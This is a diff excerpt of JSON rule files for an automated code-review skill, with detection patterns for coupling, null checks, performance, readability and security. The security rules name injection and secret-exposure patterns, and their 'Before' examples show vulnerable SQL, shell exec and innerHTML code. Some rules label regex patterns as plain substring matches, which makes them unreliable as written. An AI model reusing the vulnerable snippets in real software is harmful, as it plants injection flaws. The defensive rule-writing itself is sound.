"description": "Direct instantiation of services/repositories creates tight coupling",
|
||||
"recommendation": "Define interfaces and use dependency injection for loose coupling and testability",
|
||||
"fixExample": "// Before - tight coupling\nclass OrderService {\n private repo = new OrderRepository();\n}\n\n// After - loose coupling\ninterface IOrderRepository {\n findById(id: string): Promise<Order>;\n}\n\nclass OrderService {\n constructor(private repo: IOrderRepository) {}\n}"
|
||||
},
|
||||
{
|
||||
"id": "mixed-concerns",
|
||||
"category": "separation-of-concerns",
|
||||
"severity": "medium",
|
||||
"pattern": "fetch\\s*\\(|axios\\.|http\\.",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["component", "view", "page"],
|
||||
"description": "Network calls in UI components mix data fetching with presentation",
|
||||
"recommendation": "Extract data fetching to hooks, services, or state management layer",
|
||||
"fixExample": "// Before - fetch in component\nfunction UserList() {\n const [users, setUsers] = useState([]);\n useEffect(() => {\n fetch('/api/users').then(r => r.json()).then(setUsers);\n }, []);\n}\n\n// After - custom hook\nfunction useUsers() {\n return useQuery('users', () => userService.getAll());\n}\n\nfunction UserList() {\n const { data: users } = useUsers();\n}"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "correctness",
|
||||
"prefix": "CORR",
|
||||
"description": "Rules for detecting logical errors, null handling, and error handling issues",
|
||||
"rules": [
|
||||
{
|
||||
"id": "null-check",
|
||||
"category": "null-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\w+\\.\\w+(?!\\.?\\?)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\?\\.", "if\\s*\\(", "!==?\\s*null", "!==?\\s*undefined", "&&\\s*\\w+\\."],
|
||||
"description": "Property access without null/undefined check may cause runtime errors",
|
||||
"recommendation": "Add null/undefined check before accessing properties using optional chaining or conditional checks",
|
||||
"fixExample": "// Before\nobj.property.value\n\n// After\nobj?.property?.value\n// or\nif (obj && obj.property) { obj.property.value }"
|
||||
},
|
||||
{
|
||||
"id": "empty-catch",
|
||||
"category": "empty-catch",
|
||||
"severity": "high",
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex",
|
||||
"description": "Empty catch block silently swallows errors, hiding bugs and making debugging difficult",
|
||||
"recommendation": "Log the error, rethrow it, or handle it appropriately. Never silently ignore exceptions",
|
||||
"fixExample": "// Before\ncatch (e) { }\n\n// After\ncatch (e) {\n console.error('Operation failed:', e);\n throw e; // or handle appropriately\n}"
|
||||
},
|
||||
{
|
||||
"id": "unreachable-code",
|
||||
"category": "unreachable-code",
|
||||
"severity": "medium",
|
||||
"pattern": "return\\s+[^;]+;\\s*\\n\\s*[^}\\s]",
|
||||
"patternType": "regex",
|
||||
"description": "Code after return statement is unreachable and will never execute",
|
||||
"recommendation": "Remove unreachable code or restructure the logic to ensure all code paths are accessible",
|
||||
"fixExample": "// Before\nfunction example() {\n return value;\n doSomething(); // unreachable\n}\n\n// After\nfunction example() {\n doSomething();\n return value;\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-index-unchecked",
|
||||
"category": "boundary-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\[\\d+\\]|\\[\\w+\\](?!\\s*[!=<>])",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\.length", "Array\\.isArray", "\\?.\\["],
|
||||
"description": "Array index access without boundary check may cause undefined access or out-of-bounds errors",
|
||||
"recommendation": "Check array length or use optional chaining before accessing array elements",
|
||||
"fixExample": "// Before\nconst item = arr[index];\n\n// After\nconst item = arr?.[index];\n// or\nconst item = index < arr.length ? arr[index] : defaultValue;"
|
||||
},
|
||||
{
|
||||
"id": "comparison-type-coercion",
|
||||
"category": "type-safety",
|
||||
"severity": "medium",
|
||||
"pattern": "[^!=]==[^=]|[^!]==[^=]",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["===", "!=="],
|
||||
"description": "Using == instead of === can lead to unexpected type coercion",
|
||||
"recommendation": "Use strict equality (===) to avoid implicit type conversion",
|
||||
"fixExample": "// Before\nif (value == null)\nif (a == b)\n\n// After\nif (value === null || value === undefined)\nif (a === b)"
|
||||
}
|
||||
]
|
||||
}
|
||||
.claude/skills/review-code/specs/rules/index.md (new file, 140 lines)
# Code Review Rules Index

This directory contains externalized review rules for the multi-dimensional code review skill.

## Directory Structure

```
rules/
├── index.md                 # This file
├── correctness-rules.json   # CORR - Logic and error handling
├── security-rules.json      # SEC - Security vulnerabilities
├── performance-rules.json   # PERF - Performance issues
├── readability-rules.json   # READ - Code clarity
├── testing-rules.json       # TEST - Test quality
└── architecture-rules.json  # ARCH - Design patterns
```

## Rule File Schema

Each rule file follows this JSON schema:

```json
{
  "dimension": "string",      // Dimension identifier
  "prefix": "string",         // Finding ID prefix (4 chars)
  "description": "string",    // Dimension description
  "rules": [
    {
      "id": "string",                       // Unique rule identifier
      "category": "string",                 // Rule category within dimension
      "severity": "critical|high|medium|low",
      "pattern": "string",                  // Detection pattern
      "patternType": "regex|includes|ast",
      "negativePatterns": [],               // Patterns that exclude matches
      "caseInsensitive": false,             // For regex patterns
      "contextPattern": "",                 // Additional context requirement
      "contextPath": [],                    // Path patterns for context
      "lineThreshold": 0,                   // For size-based rules
      "methodThreshold": 0,                 // For complexity rules
      "description": "string",              // Issue description
      "recommendation": "string",           // How to fix
      "fixExample": "string"                // Code example
    }
  ]
}
```
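
The schema above is informal (the inline comments are not valid JSON), but a lightweight loader can still enforce the required fields and the severity and pattern-type enums. A minimal sketch follows; `validateRuleFile` is an illustrative helper name, not part of the skill itself:

```javascript
// Sketch of a loader that checks the fields documented in the schema above.
// Fields not listed there are left untouched.
const fs = require('fs');

const SEVERITIES = new Set(['critical', 'high', 'medium', 'low']);
const PATTERN_TYPES = new Set(['regex', 'includes', 'ast']);

function validateRuleFile(path) {
  const file = JSON.parse(fs.readFileSync(path, 'utf8'));
  const errors = [];

  if (typeof file.dimension !== 'string') errors.push('missing "dimension"');
  if (typeof file.prefix !== 'string' || file.prefix.length === 0) errors.push('missing "prefix"');

  for (const rule of file.rules ?? []) {
    if (!rule.id) errors.push('rule without "id"');
    if (!SEVERITIES.has(rule.severity)) errors.push(`${rule.id}: bad severity "${rule.severity}"`);
    if (!PATTERN_TYPES.has(rule.patternType)) errors.push(`${rule.id}: bad patternType`);
    if (typeof rule.pattern !== 'string') errors.push(`${rule.id}: missing "pattern"`);
    else if (rule.patternType === 'regex') new RegExp(rule.pattern); // throws on invalid regex
  }

  if (errors.length) throw new Error(`${path}: ${errors.join('; ')}`);
  return file;
}

validateRuleFile('security-rules.json');
```
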

## Dimension Summary

| Dimension | Prefix | Rules | Focus Areas |
|-----------|--------|-------|-------------|
| Correctness | CORR | 5 | Null checks, error handling, type safety |
| Security | SEC | 5 | XSS, injection, secrets, crypto |
| Performance | PERF | 5 | Complexity, I/O, memory leaks |
| Readability | READ | 5 | Naming, length, nesting, magic values |
| Testing | TEST | 5 | Assertions, coverage, mock quality |
| Architecture | ARCH | 5 | Dependencies, layering, coupling |

## Severity Levels

| Severity | Description | Action |
|----------|-------------|--------|
| **critical** | Security vulnerability or data loss risk | Must fix before release |
| **high** | Bug or significant quality issue | Fix in current sprint |
| **medium** | Code smell or maintainability concern | Plan to address |
| **low** | Style or minor improvement | Address when convenient |

## Pattern Types

### regex

Standard regular expression pattern. Supports flags via `caseInsensitive`.

```json
{
  "pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
  "patternType": "regex"
}
```

### includes

Simple substring match. Faster than regex for literal strings.

```json
{
  "pattern": "innerHTML",
  "patternType": "includes"
}
```

### ast (Future)

AST-based detection for complex structural patterns.

```json
{
  "pattern": "function[params>5]",
  "patternType": "ast"
}
```
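
The usage snippet below calls a `detectByPattern` helper without showing it. A minimal dispatcher over the two implemented pattern types might look like the following sketch; the helper name matches the snippet below, but the body, the shape of the match records, and the choice of "context = the line the match starts on" are assumptions, not the skill's actual implementation:

```javascript
// Sketch: dispatch on patternType and return one match record per hit.
// "ast" is documented above as future work, so it is rejected here.
function detectByPattern(content, pattern, patternType, caseInsensitive = false) {
  const matches = [];

  if (patternType === 'includes') {
    // Simple substring scan over the whole file.
    let from = 0;
    while (true) {
      const idx = content.indexOf(pattern, from);
      if (idx === -1) break;
      matches.push({ index: idx, context: contextAround(content, idx) });
      from = idx + pattern.length;
    }
  } else if (patternType === 'regex') {
    const flags = 'g' + (caseInsensitive ? 'i' : '');
    for (const m of content.matchAll(new RegExp(pattern, flags))) {
      matches.push({ index: m.index, context: contextAround(content, m.index) });
    }
  } else {
    throw new Error(`Unsupported patternType: ${patternType}`);
  }

  return matches;
}

// A match's context is taken to be the line it starts on;
// negativePatterns are checked against this context.
function contextAround(content, index) {
  const start = content.lastIndexOf('\n', index) + 1;
  const end = content.indexOf('\n', index);
  return content.slice(start, end === -1 ? content.length : end);
}
```
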

## Usage in Code

```javascript
// Load rules
const fs = require('fs');
const rules = JSON.parse(fs.readFileSync('correctness-rules.json', 'utf8'));

// Apply rules to `content`, the source text of the file under review
const findings = [];
let counter = 1;

for (const rule of rules.rules) {
  const matches = detectByPattern(content, rule.pattern, rule.patternType);
  for (const match of matches) {
    // Skip matches excluded by negative patterns (stored as regex strings)
    if (rule.negativePatterns?.some(np => new RegExp(np).test(match.context))) {
      continue;
    }
    findings.push({
      id: `${rules.prefix}-${counter++}`,
      severity: rule.severity,
      category: rule.category,
      description: rule.description,
      recommendation: rule.recommendation,
      fixExample: rule.fixExample
    });
  }
}
```
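
Some rules (for example `array-in-loop`) also carry a `contextPattern`, which the snippet above does not consult. One way to honor it, sketched here as an assumption rather than the skill's actual behavior, is to require the context pattern to match within a small window of lines around the finding:

```javascript
// Sketch: keep a match only if the rule's contextPattern (when present)
// appears near the match. The window size is arbitrary for illustration.
function matchesContext(content, match, rule, windowLines = 5) {
  if (!rule.contextPattern) return true; // no extra requirement

  const lines = content.split('\n');
  const lineNo = content.slice(0, match.index).split('\n').length - 1; // 0-based line of the match
  const start = Math.max(0, lineNo - windowLines);
  const window = lines.slice(start, lineNo + windowLines + 1).join('\n');

  return new RegExp(rule.contextPattern).test(window);
}

// Inside the loop above:
//   if (!matchesContext(content, match, rule)) continue;
```
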

## Adding New Rules

1. Identify the appropriate dimension
2. Create rule with unique `id` within dimension
3. Choose appropriate `patternType`
4. Provide clear `description` and `recommendation`
5. Include practical `fixExample`
6. Test against sample code (a minimal example entry is sketched after this list)
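
For illustration only, a hypothetical correctness rule following these steps might look like this; the `await-in-loop` id, pattern, and wording are invented for the example and are not part of the shipped rule set:

```json
{
  "id": "await-in-loop",
  "category": "async-efficiency",
  "severity": "medium",
  "pattern": "for\\s*\\([^)]*\\)\\s*\\{[^}]*await\\s",
  "patternType": "regex",
  "description": "Awaiting inside a loop serializes independent async work",
  "recommendation": "Collect promises and use Promise.all when iterations are independent",
  "fixExample": "// Before\nfor (const id of ids) {\n  results.push(await fetchItem(id));\n}\n\n// After\nconst results = await Promise.all(ids.map(fetchItem));"
}
```
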

## Rule Maintenance

- Review rules quarterly for relevance
- Update patterns as language/framework evolves
- Track false positive rates
- Collect feedback from users
59  .claude/skills/review-code/specs/rules/performance-rules.json  Normal file
@@ -0,0 +1,59 @@
{
  "dimension": "performance",
  "prefix": "PERF",
  "description": "Rules for detecting performance issues including inefficient algorithms, memory leaks, and resource waste",
  "rules": [
    {
      "id": "nested-loops",
      "category": "algorithm-complexity",
      "severity": "medium",
      "pattern": "for\\s*\\([^)]+\\)\\s*\\{[^}]*for\\s*\\([^)]+\\)|forEach\\s*\\([^)]+\\)\\s*\\{[^}]*forEach",
      "patternType": "regex",
      "description": "Nested loops may indicate O(n^2) or worse complexity. Consider if this can be optimized",
      "recommendation": "Use Map/Set for O(1) lookups, break early when possible, or restructure the algorithm",
      "fixExample": "// Before - O(n^2)\nfor (const a of listA) {\n for (const b of listB) {\n if (a.id === b.id) { ... }\n }\n}\n\n// After - O(n)\nconst bMap = new Map(listB.map(b => [b.id, b]));\nfor (const a of listA) {\n const b = bMap.get(a.id);\n if (b) { ... }\n}"
    },
    {
      "id": "array-in-loop",
      "category": "inefficient-operation",
      "severity": "high",
      "pattern": "\\.includes\\s*\\(|indexOf\\s*\\(|find\\s*\\(",
"patternType": "includes",
|
||||
"contextPattern": "for|while|forEach|map|filter|reduce",
|
||||
"description": "Array search methods inside loops cause O(n*m) complexity. Consider using Set or Map",
|
||||
"recommendation": "Convert array to Set before the loop for O(1) lookups",
|
||||
"fixExample": "// Before - O(n*m)\nfor (const item of items) {\n if (existingIds.includes(item.id)) { ... }\n}\n\n// After - O(n)\nconst idSet = new Set(existingIds);\nfor (const item of items) {\n if (idSet.has(item.id)) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "synchronous-io",
|
||||
"category": "io-efficiency",
|
||||
"severity": "high",
|
||||
"pattern": "readFileSync|writeFileSync|execSync|spawnSync",
|
||||
"patternType": "includes",
|
||||
"description": "Synchronous I/O blocks the event loop and degrades application responsiveness",
|
||||
"recommendation": "Use async versions (readFile, writeFile) or Promise-based APIs",
|
||||
"fixExample": "// Before\nconst data = fs.readFileSync(path);\n\n// After\nconst data = await fs.promises.readFile(path);\n// or\nfs.readFile(path, (err, data) => { ... });"
|
||||
},
|
||||
{
|
||||
"id": "memory-leak-closure",
|
||||
"category": "memory-leak",
|
||||
"severity": "high",
|
||||
"pattern": "addEventListener\\s*\\(|setInterval\\s*\\(|setTimeout\\s*\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["removeEventListener", "clearInterval", "clearTimeout"],
|
||||
"description": "Event listeners and timers without cleanup can cause memory leaks",
|
||||
"recommendation": "Always remove event listeners and clear timers in cleanup functions (componentWillUnmount, useEffect cleanup)",
|
||||
"fixExample": "// Before\nuseEffect(() => {\n window.addEventListener('resize', handler);\n}, []);\n\n// After\nuseEffect(() => {\n window.addEventListener('resize', handler);\n return () => window.removeEventListener('resize', handler);\n}, []);"
|
||||
},
|
||||
    {
      "id": "unnecessary-rerender",
      "category": "react-performance",
      "severity": "medium",
      "pattern": "useState\\s*\\(\\s*\\{|useState\\s*\\(\\s*\\[",
      "patternType": "regex",
      "description": "Object/array literals passed directly to useState are re-created on every render even though the initial value is only used once",
      "recommendation": "Use a lazy initializer (useState(() => value)), hoist the constant outside the component, or memoize derived values with useMemo/useCallback",
      "fixExample": "// Before - literal re-created on every render\nconst [config, setConfig] = useState({ theme: 'dark' });\n\n// After - lazy initializer runs once\nconst [config, setConfig] = useState(() => ({ theme: 'dark' }));"
    }
  ]
}
60  .claude/skills/review-code/specs/rules/readability-rules.json  Normal file
@@ -0,0 +1,60 @@
{
  "dimension": "readability",
  "prefix": "READ",
  "description": "Rules for detecting code readability issues including naming, complexity, and documentation",
  "rules": [
    {
      "id": "long-function",
      "category": "function-length",
      "severity": "medium",
      "pattern": "function\\s+\\w+\\s*\\([^)]*\\)\\s*\\{|=>\\s*\\{",
      "patternType": "regex",
      "lineThreshold": 50,
      "description": "Functions longer than 50 lines are difficult to understand and maintain",
      "recommendation": "Break down into smaller, focused functions. Each function should do one thing well",
      "fixExample": "// Before - 100 line function\nfunction processData(data) {\n // validation\n // transformation\n // calculation\n // formatting\n // output\n}\n\n// After - composed functions\nfunction processData(data) {\n const validated = validateData(data);\n const transformed = transformData(validated);\n return formatOutput(calculateResults(transformed));\n}"
    },
    {
      "id": "single-letter-variable",
      "category": "naming",
      "severity": "low",
      "pattern": "(?:const|let|var)\\s+[a-z]\\s*=",
      "patternType": "regex",
      "negativePatterns": ["for\\s*\\(", "\\[\\w,\\s*\\w\\]", "catch\\s*\\(e\\)"],
      "description": "Single letter variable names reduce code readability except in specific contexts (loop counters, catch)",
      "recommendation": "Use descriptive names that convey the variable's purpose",
      "fixExample": "// Before\nconst d = getData();\nconst r = d.map(x => x.value);\n\n// After\nconst userData = getData();\nconst userValues = userData.map(user => user.value);"
    },
    {
      "id": "deep-nesting",
      "category": "complexity",
      "severity": "high",
      "pattern": "\\{[^}]*\\{[^}]*\\{[^}]*\\{",
      "patternType": "regex",
      "description": "Deeply nested code (4+ levels) is hard to follow and maintain",
      "recommendation": "Use early returns, extract functions, or flatten conditionals",
      "fixExample": "// Before\nif (user) {\n if (user.permissions) {\n if (user.permissions.canEdit) {\n if (document.isEditable) {\n // do work\n }\n }\n }\n}\n\n// After\nif (!user?.permissions?.canEdit) return;\nif (!document.isEditable) return;\n// do work"
    },
    {
      "id": "magic-number",
      "category": "magic-value",
      "severity": "low",
      "pattern": "[^\\d]\\d{2,}[^\\d]|setTimeout\\s*\\([^,]+,\\s*\\d{4,}\\)",
      "patternType": "regex",
      "negativePatterns": ["const", "let", "enum", "0x", "100", "1000"],
      "description": "Magic numbers without explanation make code hard to understand",
      "recommendation": "Extract magic numbers into named constants with descriptive names",
      "fixExample": "// Before\nif (status === 403) { ... }\nsetTimeout(callback, 86400000);\n\n// After\nconst HTTP_FORBIDDEN = 403;\nconst ONE_DAY_MS = 24 * 60 * 60 * 1000;\nif (status === HTTP_FORBIDDEN) { ... }\nsetTimeout(callback, ONE_DAY_MS);"
    },
    {
      "id": "commented-code",
      "category": "dead-code",
      "severity": "low",
      "pattern": "//\\s*(const|let|var|function|if|for|while|return)\\s+",
      "patternType": "regex",
      "description": "Commented-out code adds noise and should be removed. Use version control for history",
      "recommendation": "Remove commented code. If needed for reference, add a comment explaining why with a link to relevant commit/issue",
      "fixExample": "// Before\n// function oldImplementation() { ... }\n// const legacyConfig = {...};\n\n// After\n// See PR #123 for previous implementation\n// removed 2024-01-01"
    }
  ]
}
58  .claude/skills/review-code/specs/rules/security-rules.json  Normal file
@@ -0,0 +1,58 @@
{
  "dimension": "security",
  "prefix": "SEC",
  "description": "Rules for detecting security vulnerabilities including XSS, injection, and credential exposure",
  "rules": [
    {
      "id": "xss-innerHTML",
      "category": "xss-risk",
      "severity": "critical",
      "pattern": "innerHTML\\s*=|dangerouslySetInnerHTML",
"patternType": "includes",
|
||||
"description": "Direct HTML injection via innerHTML or dangerouslySetInnerHTML can lead to XSS vulnerabilities",
|
||||
"recommendation": "Use textContent for plain text, or sanitize HTML input using a library like DOMPurify before injection",
|
||||
"fixExample": "// Before\nelement.innerHTML = userInput;\n<div dangerouslySetInnerHTML={{__html: data}} />\n\n// After\nelement.textContent = userInput;\n// or\nimport DOMPurify from 'dompurify';\nelement.innerHTML = DOMPurify.sanitize(userInput);"
|
||||
},
|
||||
{
|
||||
"id": "hardcoded-secret",
|
||||
"category": "hardcoded-secret",
|
||||
"severity": "critical",
|
||||
"pattern": "(?:password|secret|api[_-]?key|token|credential)\\s*[=:]\\s*['\"][^'\"]{8,}['\"]",
|
||||
"patternType": "regex",
|
||||
"caseInsensitive": true,
|
||||
"description": "Hardcoded credentials detected in source code. This is a security risk if code is exposed",
|
||||
"recommendation": "Use environment variables, secret management services, or configuration files excluded from version control",
|
||||
"fixExample": "// Before\nconst apiKey = 'sk-1234567890abcdef';\n\n// After\nconst apiKey = process.env.API_KEY;\n// or\nconst apiKey = await getSecretFromVault('api-key');"
|
||||
},
|
||||
{
|
||||
"id": "sql-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "query\\s*\\(\\s*[`'\"].*\\$\\{|execute\\s*\\(\\s*[`'\"].*\\+",
|
||||
"patternType": "regex",
|
||||
"description": "String concatenation or template literals in SQL queries can lead to SQL injection",
|
||||
"recommendation": "Use parameterized queries or prepared statements with placeholders",
|
||||
"fixExample": "// Before\ndb.query(`SELECT * FROM users WHERE id = ${userId}`);\n\n// After\ndb.query('SELECT * FROM users WHERE id = ?', [userId]);\n// or\ndb.query('SELECT * FROM users WHERE id = $1', [userId]);"
|
||||
},
|
||||
{
|
||||
"id": "command-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "exec\\s*\\(|execSync\\s*\\(|spawn\\s*\\([^,]*\\+|child_process",
|
||||
"patternType": "regex",
|
||||
"description": "Command execution with user input can lead to command injection attacks",
|
||||
"recommendation": "Validate and sanitize input, use parameterized commands, or avoid shell execution entirely",
|
||||
"fixExample": "// Before\nexec(`ls ${userInput}`);\n\n// After\nexecFile('ls', [sanitizedInput], options);\n// or use spawn with {shell: false}"
|
||||
},
|
||||
{
|
||||
"id": "insecure-random",
|
||||
"category": "cryptography",
|
||||
"severity": "high",
|
||||
"pattern": "Math\\.random\\(\\)",
|
||||
"patternType": "includes",
|
||||
"description": "Math.random() is not cryptographically secure and should not be used for security-sensitive operations",
|
||||
"recommendation": "Use crypto.randomBytes() or crypto.getRandomValues() for security-critical random generation",
|
||||
"fixExample": "// Before\nconst token = Math.random().toString(36);\n\n// After\nimport crypto from 'crypto';\nconst token = crypto.randomBytes(32).toString('hex');"
|
||||
}
|
||||
]
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff.